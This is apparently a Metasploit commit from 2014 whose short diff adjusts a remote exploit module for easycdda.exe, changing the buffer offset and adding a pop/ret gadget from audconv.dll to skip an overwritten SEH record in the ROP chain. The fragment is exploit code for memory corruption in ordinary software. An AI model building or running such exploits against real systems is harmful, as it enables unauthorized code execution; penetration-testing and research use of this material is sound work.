Use pop#ret to jump over the overwritten seh

bug/bundler_fix
jvazquez-r7 2014-02-12 08:10:14 -06:00
parent 11513d94f5
commit 9845970e12
1 changed files with 2 additions and 1 deletions


@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1112,
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
@ -105,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets